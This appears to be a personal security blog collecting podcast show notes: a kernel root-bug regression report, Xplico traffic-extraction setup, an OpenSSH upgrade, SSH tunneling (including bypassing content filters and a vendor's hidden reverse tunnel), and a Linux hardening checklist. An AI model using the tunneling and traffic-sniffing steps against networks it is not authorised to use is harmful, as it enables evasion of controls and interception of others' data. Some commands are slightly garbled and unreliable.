I am sure by noon today you will see lots more technology blogs talking about this old but yet new bug. “The Linux kernel has been purged of a bug that gave root access to untrusted users – again.”

Background:

The vulnerability in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa) was fixed once before – in 2007 with the release of version 2.6.22.7. But several months later, developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access.

//

The bug was originally discovered by the late hacker Wojciech “cliph” Purczynski. But Ben Hawkes, the researcher who discovered the kernel regression bug, said here that he grew suspicious when he recently began tinkering under the hood of the open-source OS and saw signs the flaw was still active. Read the complete article over at The Register..

Sample exploit is already in the wild as show via http://seclists.org/fulldisclosure/2010/Sep/268 . Since I am not a expert in exploit development or analysis I will sit back and wait for the guys over at Metasploit or SET to whip up so I can test.

I  appeared on the Linux Basix podcast once more, I am becoming a regular . Below are some of the things I spoke of during my segment.

Discussion Links:

1. Symantec Snoop Dogg rap contest site rickrolled: Symantec’s attempts to link up with Snoop Dogg to launch a cybercrime rap contest, to bring about awareness on the issue. However it turned out that the site had several vulnerabilities and had to be taken down for maintenance, read more over at  http://www.theregister.co.uk/2010/09/03/symantec_rap_contest_farce/.
2. Facebook adds new remote log-out security feature: Facebook on Thursday announced a new security feature that will allow users to see if they are logged into their accounts on a different computer and to remotely log out if so. This can also be used to see if someone has your password and has been logging in when you are not around. The new security feature follows a Login Notification feature the company announced in May that lets users tell Facebook to notify them via e-mail or SMS when a new computer or device is used to log into their account, read more over at  http://news.cnet.com/8301-27080_3-20015482-245.html .
3. Rosetta Stone for Unix: The goal of this site is to give you a command syntax comparison between Linux, Unix, MAC OSX, and a few others, visit http://bhami.com/rosetta.html and have some fun. Another good site with a collection of Unix/Linux/BSD commands is –> http://cb.vu/unixtoolbox.xhtml which gives you the option to save the page as a new PDF ebook.
4. Malware hosted on Google Code project site: Malicious individuals are using the Google Code repository to host Trojans horses, backdoors and password stealing keyloggers, according to researchers at Zscaler. The researchers found a malicious project hosted on the free Google Code site with about 50+ malware executables stored in the download section of the project. “The first malicious file was uploaded on June 24, 2010 and was still active at the end of August this year, proving that Google is slow to find and remove malicious projects”, read more over at http://www.zdnet.com/blog/security/malware-hosted-on-google-code-project-site/7247

Tech Segment: Installing and using Xplico

What is Xplico?

The goal of Xplico is extract from an internet traffic capture the applications data contained. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. Xplico isn’t a network protocol analyzer. Xplico is an open source Network Forensic Analysis Tool (NFAT).

Features

• Protocols supported: HTTP, SIP, IMAP, POP, SMTP, TCP, UDP, IPv6, …;
• Port Independent Protocol Identification (PIPI) for each application protocol;
• Multithreading;
• Output data and information in SQLite database or Mysql database and/or files;
• At each data reassembled by Xplico is associated a XML file that uniquely identifies the flows and the pcap containing the data reassembled;
• Realtime elaboration (depends on the number of flows, the types of protocols and by the performance of computer -RAM, CPU, HD access time, …-);
• TCP reassembly with ACK verification for any packet or soft ACK verification;
• Reverse DNS lookup from DNS packages contained in the inputs files (pcap), not from external DNS server;
• No size limit on data entry or the number of files entrance (the only limit is HD size);
• IPv4 and IPv6 support
• Modularity. Each Xplico component is modular. The input interface, the protocol decoder (Dissector) and the output interface (dispatcer) are all modules
• The ability to easily create any kind of dispatcer with which to organize the data extracted in the most appropriate and useful to you

Installing and Configuring:

First begin with a little sudo fu and install the following packages:

apt-get install tcpdump tshark apache2 php5 php5-sqlite build-essential perl zlib1g-dev libpcap-dev libsqlite3-dev php5-cli libapache2-mod-php5 libx11-dev libxt-dev libxaw7-dev python-all sqlite3 recode sox lame libnet1 libnet1-dev libmysqlclient15-dev

Create a temp directory to wget your files too with mkdir Xbuild and cd Xbuild

Download Xplico source code from SorceForge or BerliOS

tar zxvf xplico-0.5.x.tgz

wget http://geolite.maxmind.com/download/geoip/api/c/GeoIP-1.4.6.tar.gz
tar zxvf GeoIP-1.4.6.tar.gz

cd GeoIP-1.4.6
./configure
make

cd ..
rm -f *.tar.gz

cd xplico
wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
gzip -d GeoLiteCity.dat.gz
rm -f *dat.gz
make

cd ..
wget http://mirror.cs.wisc.edu/pub/mirrors/ghost/GPL/ghostpdl/ghostpdl-8.70.tar.bz2
tar jxvf ghostpdl-8.70.tar.bz2

The ghostpcl contains the pcl6 application that it is necessary to “network printer job”

rm -f *.bz2
cd ghostpdl-8.70
make

Wait for some time

cd ..
cp ghostpdl-8.70/main/obj/pcl6 xplico-0.5.x
rm -rf ghostpdl-8.70

Download videosnarf from http://ucsniff.sourceforge.net/videosnarf.html. Note for 64 bits architectures: Some codec libraries are proprietary and are only for 32bits architecture. The only solution in this case is this: http://forum.xplico.org/viewtopic.php?p=453#p453

wget http://downloads.sourceforge.net/project/ucsniff/videosnarf/videosnarf-0.63.tar.gz
tar xvzf videosnarf-0.63.tar.gz
cd videosnarf-0.63
./configure
make
cd ..
cp videosnarf-0.63/src/videosnarf xplico-0.5.x

Install Xplico

cd xplico-0.5.x
make install

Copy Apache configuration file

cp /opt/xplico/cfg/apache_xi /etc/apache2/sites-enabled/xplico

After this we have to change Apache ports file to add port of XI. Then, in /etc/apache2/ports.conf add:

# xplico Host port
NameVirtualHost *:9876
Listen 9876

We must also modify the php.ini file to allow uploads (pcap) files. Edit /etc/php5/apache2/php.ini.

The lines to modify are:\\
**post_max_size = 100M** \\
**upload_max_filesize = 100M**\\

Enable mode rewrite in Apache:

a2enmod rewrite

And finally restart Apache:

/etc/init.d/apache2 restart

You can find much more information and documentation on the wiki –> http://wiki.xplico.org.

Uploading your first PCAP file:

1. Log into the user inter by going to http://xplicoip:9876
2. Username:xplico and password:xplico please change after
3. Click on Case to create a new case.
4. Click on session to create a new session
5. Click on newly created session within the newly created case and click upload–> browse to your capturefile.pcap.
6. You can also create a live stream and just have the host sit there passively listening.

Sit back wait for xplico to works it’s magic and then browse your results. View this page to see screen-shots of all the various options of xplico –> http://wiki.xplico.org/doku.php?id=web_interface. Now all your have to do is go sniffing, read the manual and have fun viewing your results.

The below post is just a quick writeup that can be serve as an addition to the show notes for my segment on the Linux Basix podcast.

Discussion Links:

1. Gmail made you look like a spammer this week –>  Graham Cluley’s blog Over 4 million Gmail users had their email messages being sent multiple times. “At least if your home or business computer was spewing out spam you can pull the cable out of the back of your PC. With web base services like Gmail you dont have that option”
2. http://blog.commandlinekungfu.com/ and http://shelldorado.com/shelltips/beginner.html–> Great blogs for learning the commandline, keep reading and you will be a command line Ninja one day.
3. http://garinkilpatrick.com/21-wicked-wordpress-plugins/–> Tons of interesting plug-ins for you to have fun with.
4. http://www.cyberciti.biz/tips/top-linux-monitoring-tools.html –> 20 Linux System Monitoring Tools Every SysAdmin Should Know, with over 143 comments a **Must Read**.

Installing OpenSSH 5.6

Now in keeping with my theme of always keeping your software update, I notice that a new version of OpenSSH was released on August 24th. Why update you might as?

List of features that my change your mind:

Changes since OpenSSH 5.5
=========================
Features:

* Added a ControlPersist option to ssh_config(5) that automatically
starts a background ssh(1) multiplex master when connecting. This
connection can stay alive indefinitely, or can be set to
automatically close after a user-specified duration of inactivity.

* Hostbased authentication may now use certificate host keys. CA keys
must be specified in a known_hosts file using the @cert-authority
marker as described in sshd(8).

* ssh-keygen(1) now supports signing certificate using a CA key that
has been stored in a PKCS#11 token.

* ssh(1) will now log the hostname and address that we connected to at
LogLevel=verbose after authentication is successful to mitigate
“phishing” attacks by servers with trusted keys that accept
authentication silently and automatically before presenting fake
password/passphrase prompts.

Note that, for such an attack to be successful, the user must have
disabled StrictHostKeyChecking (enabled by default) or an attacker
must have access to a trusted host key for the destination server.

* Expand %h to the hostname in ssh_config Hostname options. While this
sounds useless, it is actually handy for working with unqualified
hostnames:

Host *.*
Hostname %h
Host *
Hostname %h.example.org

* Allow ssh-keygen(1) to import (-i) and export (-e) of PEM and PKCS#8
keys in addition to RFC4716 (SSH.COM) encodings via a new -m option
(bz#1749)

* sshd(8) will now queue debug messages for bad ownership or
permissions on the user’s keyfiles encountered during authentication
and will send them after authentication has successfully completed.
These messages may be viewed in ssh(1) at LogLevel=debug or higher.

* ssh(1) connection multiplexing now supports remote forwarding with
dynamic port allocation and can report the allocated port back to
the user:

LPORT=`ssh -S muxsocket -R0:localhost:25 -O forward somehost`

* sshd(8) now supports indirection in matching of principal names
listed in certificates. By default, if a certificate has an
embedded principals list then the username on the server must match
one of the names in the list for it to be accepted for
authentication.

sshd(8) now has a new AuthorizedPrincipalsFile option to specify a
file containing a list of names that may be accepted in place of the
username when authorizing a certificate trusted via the
sshd_config(5) TrustedCAKeys option. Similarly, authentication
using a CA trusted in ~/.ssh/authorized_keys now accepts a
principals=”name1[,name2,...]” to specify a list of permitted names.

If either option is absent, the current behaviour of requiring the
username to appear in principals continues to apply. These options
are useful for role accounts, disjoint account namespaces and
“user@realm”-style naming policies in certificates.

* Additional sshd_config(5) options are now valid inside Match blocks:

AuthorizedKeysFile
AuthorizedPrincipalsFile
HostbasedUsesNameFromPacketOnly
PermitTunnel

* Revised the format of certificate keys. The new format, identified as
ssh-{dss,rsa}-cert-v01@openssh.com includes the following changes:

- Adding a serial number field. This may be specified by the CA at
the time of certificate signing.

- Moving the nonce field to the beginning of the certificate where
it can better protect against chosen-prefix attacks on the
signature hash (currently infeasible against the SHA1 hash used)

- Renaming the “constraints” field to “critical options”

- Addng a new non-critical “extensions” field. The “permit-*”
options are now extensions, rather than critical options to
permit non-OpenSSH implementation of this key format to degrade
gracefully when encountering keys with options they do not
recognize.

The older format is still supported for authentication and may still
be used when signing certificates (use “ssh-keygen -t v00 …”).
The v00 format, introduced in OpenSSH 5.4, will be supported for at
least one year from this release, after which it will be deprecated
and removed.

Install time…

I am attempting to install this on a headless Ubuntu server the first command I am going to try is:

# sudo apt-get install openssh-server openssh-client

Now since this was a recent release your average apt-get install command wouldn’t work here because it takes some time for the many repository to be populated with the new versions.

Obtaining your copy…

Just do a quick wget

wget http://filedump.se.rit.edu/pub/OpenBSD/OpenSSH/portable/openssh-5.6p1.tar.gz

Prerequisites
—————-

You will need working installations of Zlib and OpenSSL.

Zlib 1.1.4 or 1.2.1.2 or greater (earlier 1.2.x versions have problems):
http://www.gzip.org/zlib/

OpenSSL 0.9.6 or greater:
http://www.openssl.org/

Building / Installation
————————–
To install OpenSSH with default options:

./configure
make
make install

While I was waiting with excitement for my new app to build and install I keep getting the following error “configure: error: *** OpenSSL headers missing – please install first or check config.log ***”

Decided to upgrade to version Ubuntu 10.04

1. Install update-manager-core if it is not already installed:

   sudo apt-get install update-manager-core
   

2. Follow the on-screen instructions.

sudo do-release-upgrade

3. edit /etc/update-manager/release-upgrades and set Prompt=normal
4. Launch the upgrade tool:

Only to realize that the fix was to install the libssl-dev package

apt-get install libssl-dev

Other useful commands I used:

uname -a –> Print basic information currently available from the system (Kernel version and so on)

ssh -v –> Shows you ssh version number

cat /etc/issue –> Shows you your Ubuntu build version

openssh version –> Shows you your openssh version number

Lastly you can take a read of my posting on the DLL hijacking issue if you haven’t been following it.

Links:

http://www.openssh.com/txt/release-5.6

ftp://ftp.ca.openbsd.org/pub/OpenBSD/OpenSSH/portable/INSTALL

I appeared on the Linux Basix podcast a few weeks ago but since I was out of the country for a while I am now getting around to posting the show notes for my segment.

Information Security news in the world of Linux:

• PCSC-lite vulnerability –> http://seclists.org/fulldisclosure/2010/Aug/71

A security issue affects the following Ubuntu releases:
– Ubuntu 9.04
– Ubuntu 9.10
– Ubuntu 10.04 LTS

• Brief Details :

It was discovered that the PC/SC service did not correctly handle  malformed messages. A local attacker could exploit this to execute
arbitrary code with root privileges. In short update your system NOW!

Dell Latitude 2110 vulnerability –> https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-August/001135.html

A security issue affects the following Ubuntu releases:

• Ubuntu 9.10
  Ubuntu 10.04 LTS
• Brief Details:

It was discovered that the Ubuntu image shipped on some Dell Latitude 2110 systems was accidentally configured to allow unauthenticated package installations. A remote attacker intercepting network communications or a malicious archive mirror server could exploit this to trick the user into installing unsigned packages, resulting in arbitrary code execution with root privileges.
Segment Title: SSH tunneling for good or evil!

What is SSH –

Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices.

How to install/Setup SSH?

First be sure to install the most recent version as of yesterday OpenSSH version 5.6 is the most recent version.

sudo apt-get install ssh or configure from source

• Then do a quick test by trying to SSH into your own machine, SSH  localhost
• Then of course you can always edit the  /etc/ssh/sshd_config file and do things like force version 2, deny root login and sort.

What is tunneling?

Tunneling, also known as “port forwarding,” is the transmission of data intended for use only within a private, usually corporate network through a public network in such a way that the routing nodes in the public network are unaware that the transmission is part of a private network

Various types of tunneling protocols:

• HTTP
• ICMP
• DNS
• SSH

SSH tunneling how it works: Nice Youtube video to get you started –> http://www.youtube.com/watch?v=EUplDL4hSuc

When can you use this?

• For good –> You can use this to create a Sock5 proxy to securely tunnel your web traffic for instance if you are at a free Wi-Fi hot spot.

• Or if you want to bypass some content filtering that’s in place to block you from accessing certain websites
• Securely tunnel your IM chat or Email which you know by default are both clear text protocol

Examples:

Tunneling Gtalk traffic –>  ssh -f  user@myhomeserver.com -L 3000:talk.google.com:5222 home -N

Tunneling Email –>  ssh -f user@myhomeserver.com -L 2000:personal-server.com:25 -N

• For evil –> http://infolookup.securegossip.com/2010/05/13/keeping-an-eye-on-your-vendors/, “reverse SSH tunneling “as you would expect if tunneling is getting pass a firewall  in a forward direction, reverse tunneling is getting access to the inside host by going out and coming back in. I linked to a posting I did back in May about an incident I had to track down and re-mediate.
  • In short  A vendor  of ours had a Linux based  appliance on the inside of our network in which the had a pre-configured  “stealthy reverse tunnel” that would give them access to that system at anytime without our assistance.

Reference Links

<https://secure.wikimedia.org/wikipedia/en/wiki/Secure_Shell>

https://calomel.org/firefox_ssh_proxy.html

https://help.ubuntu.com/community/SSH/OpenSSH/Configuring
http://www.howtogeek.com/howto/ubuntu/setup-openssh-server-on-ubuntu-linux/

http://searchenterprisewan.techtarget.com/sDefinition/0,,sid200_gci213230,00.html

A while back I hinted to the wonderful guys over at  http://www.linuxbasix.com/ that I would like to appear on the show and do a segment on Linux security, the agreed and below are some of the notes that can be used to follow alone with my segment.

Disclaimer: I am by no means a Linux security expert; I am just trying to bring some visibility to a topic that I believe all new users should think about.

Taken from the Linux basix website, our goal here is to bring together information that will make your introduction to Linux and Open Source Software more enjoyable and productive. As we go along we will be constantly updating this site with our shows and show notes. If you have any questions please post comments to the shows and blog. Feel free to let us know what you think of the show and we will do our best to make it make as much sense as possible. Once the forum is up and running it will be a source to find answers, tips and tricks to make computing more enjoyable.

The goal of my segment is not to touch on anything too advance, for that you can find several Linux hardening guide by CERT, NSA, and many more resources out there. Instead I will be focusing on giving a few tips that anyone new to Linux should keep in mind before connecting their server/workstation to the internet.

I would like to start by sharing a few sentences I found in a blog posting over at computer world;

“You see Windows was designed as a single-user, non-networked operating system. That design is still at the heart of Windows, which is why security must always be an add-on to Windows. Linux, in contrast, was built from the ground up as a multi-user, networked system. Linux, like Unix, which came before it, was constructed to work in a world with hostile users.”

Physical Security ( might seem silly but this should always be considered)

Configure the BIOS to disable booting from CDs/DVDs, external devices, and set a password to protect these settings, you can also go another step by encrypting your entire drive. Next, set a password for the GRUB bootloader.

Generate a password hash using the command  /usr/sbin/grub-md5-crypt.

Add the hash to the first line of /boot/grub/menu.lst as follows: password –md5 passwordhash

Minimum install as possible

Take a moment to think about your installation, I understand you might not know exactly what you want but don’t install everything at first. Just do the basics and as you learn more you can then install those additional application and do it properly. Also remove unnecessary packages, only keep the ones you need, and lastly remove any accounts that are not needed.

# yum list installed
# yum list packageName
# yum remove packageName

OR

# dpkg –list
# dpkg –info packageName
# apt-get remove packageName

Stay away form clear text protocols

Under no circumstances do you want to use any clear text protocol. Any of the following  protocols or programs   (telnet, rsh, rlogin, FTP, TFTP) can give out your username/password to anyone on your local network with a packet sniffer. If you are hosting a website or providing users with a login portal ensure that you are not using http, but instead https even if you have to generate your own certificate.

Identify all open ports and services

Its important to know what ports you have open and what services are associated to them this way you can decide if you would like to block or filter them with a firewall. This is also important so in the event you notice a new port open you already have a baseline to compare it too.

To do you can use a tool like  Nmap (“Network Mapper”) which is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

ex nmap -A -sV 127.0.0.1

You can also use the following for identifying and turning off unwanted services:

To view all services that are turned on:
# chkconfig --list | grep '3:on'

To disable a service:

# service serviceName stop
# chkconfig serviceName off

Security software

• Install Antivirus software, I am aware that Linux is not highly prone to viruses like your average Windows PC, but don’t for a moment think that Linux is not being successfully exploited in the wild every day. You want to ensure that you are not the “Low Hanging Fruit” in short don’t be the easy target.
• Install/configure firewall (SELinux, IP Tables, and AppArmor) and take a moment to read how to configure it.

Keep Your Software Up to Date

• Configure your system to update via your software repository and apply then automatically. Security updates should be applied as soon as possible.

• Create the file apt.cron, make it executable, place it in /etc/cron.daily or /etc/cron.weekly, and ensure that it reads as follows:

#!/bin/sh
/usr/bin/apt-get update#
Or aptitude –s safe-upgrade

Password policy

• You want to insure that you have a proper password policy, first identify any user accounts that has an empty password and set on or remove the account.
• Setup password aging, its important to keep rotating your password a minimum every 60 days.

Set up some sort of password lockout policy, if someone attempts a brute force attempt you need to at least slow them down, a standard practice is to lockout an account after 3 failed login attempts.To get password expiration information, enter:
chage -l userName

To see failed login attempts, enter:
faillog

To unlock an account after login failures, run:
faillog -r -u userName

Note you can use passwd command to lock and unlock accounts:
# lock account
passwd -l userName

# unlock account
passwd -u userName

Identify empty passwords type the following command
# awk -F: ‘($2 == “”) {print}’ /etc/shadow

Make Sure No Non-Root Accounts Have UID Set To 0

Only root account have UID 0 with full permissions to access the system. Type the following command to display all accounts with UID set to 0:

# awk -F: '($3 == "0") {print}' /etc/passwd
You should only see one line as follows:
root:x:0:0:root:/root:/bin/bash

If you see other lines, delete them or make sure other accounts are authorized by you to use UID 0.

File and file system security

SUID and SGID files on your system are a potential security risk, and should be monitored closely. Because these programs grant special privileges to the user who is executing them, it is necessary to ensure that insecure programs are not installed. A favorite trick of crackers is to exploit SUID-root programs, then leave a SUID program as a back door to get in the next time, even if the original hole is plugged.

• Find all SUID/SGID programs on your system, and keep track of what they are, so you are aware of any changes which could indicate a potential intruder. Use the following command to find all SUID/SGID programs on your system:

root# find  / -type  f \ ( -perm -04000 -o -perm -02000 \)

World-writable files, particularly system files, can be a security hole if a cracker gains access to your system and modifies them. Additionally, world-writable directories are dangerous, since they allow a cracker to add or delete files as he wishes. (can upload malware to a site and infect visitors)

To locate all world-writable files on your system, use the following command:

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

Secure ssh remote access

• Disable root login via ssh, if someone is going to try and brute force your ssh server the first user name the will try will be root, so ensure that you do not allow ssh login for your root user. You can verify or edit this but changing the config file in:

vi /etc/ssh/sshd_config

Find this section in the file, containing the line with “PermitRootLogin” in it.

#LoginGraceTime 2m
#PermitRootLogin no
#StrictModes yes
#MaxAuthTries 6

Then restart your SSH service with sudo /etc/init.d/sshd restart

Noowner Files

Files not owned by any user or group can pose a security problem. Just find them with the following command which do not belong to a valid user and a valid group.

find /dir -xdev \( -nouser -o -nogroup \) -print

Keeping an eye on your logs:

You should configure logging and auditing so you can keep an eye on any type of  attacks that are launched against your system. You can manually check the following logs or use a tool like logwatch or logcheck or any number of log parsers out there. Logs of interest are :

/var/log/syslog

/var/log/faillog

/var/log/auth

/var/log/lastlog

/var/log/messages

/var/log/apahe2/access.log and error.log

When all else fail, here are some useful Scripts and tools you can use:

Lynis: Lynis is an auditing tool for Unix (specialists). It scans the system and available software, to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes.

Security audit tool,is a security tool that can be used both as a security audit as well as a part of an intrusion detection system. It consists of set of tests, library and textual/graphical front-end. Tests are sorted into groups and security levels. Administrators can run selected tests, groups or whole security levels.

The Bastille Hardening program “locks down” an operating system, proactively configuring the system for increased security and decreasing its susceptibility to compromise. Bastille can also assess a system’s current state of hardening, granularity reporting on each of the security settings with which it works.

audit2.pl (perl): This second script searches the entire file system, listing SUID, SGID, world-writable, group-writable files. It also lists trust files and their contents. Finally it lists files with weird names (e.g., containing punctuation characters), which might be danger or a sign of penetration. On a large server with 100GB disks, this can take a few hours to run.

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2).  It tries to find misconfiguration that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).

DenyHosts is a script intended to be run by Linux system administrators to help thwart SSH server attacks (also known as dictionary based attacks and brute force attacks).

OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.

References:

http://iase.disa.mil/stigs/checklist/index.html

http://www.sans.org/score/checklists/linuxchecklist.pdf

http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf

http://georgia.ubuntuforums.org/showthread.php?t=1002167&page=2

http://boilinglinux.blogspot.com/2008/07/ubuntu-hardy-hardening.html

http://www.cyberciti.biz/tips/linux-security.html

http://www.debian.org/doc/manuals/securing-debian-howto/

http://tldp.org/HOWTO/Security-HOWTO/file-security.html

http://blogs.computerworld.com/16367/dell_back_tracks_on_linux_being_safer_than_windows

http://www.rootkit.nl/projects/lynis.html

https://fedorahosted.org/sectool/

http://www.security-database.com/toolswatch/

http://securitytube.net/Mastering-IPTables-video.aspx

http://nmap.org/

http://www.openvas.org/

http://www.bastille-unix.org/

http://denyhosts.sourceforge.net/

http://pentestmonkey.net/tools/unix-privesc-check/

http://www.boran.ch/audit

http://oreilly.com/pub/h/66

http://www.howtogeek.com/howto/linux/security-tip-disable-root-ssh-login-on-linux/

http://www.cyberciti.biz/faq/linux-log-files-location-and-how-do-i-view-logs-files/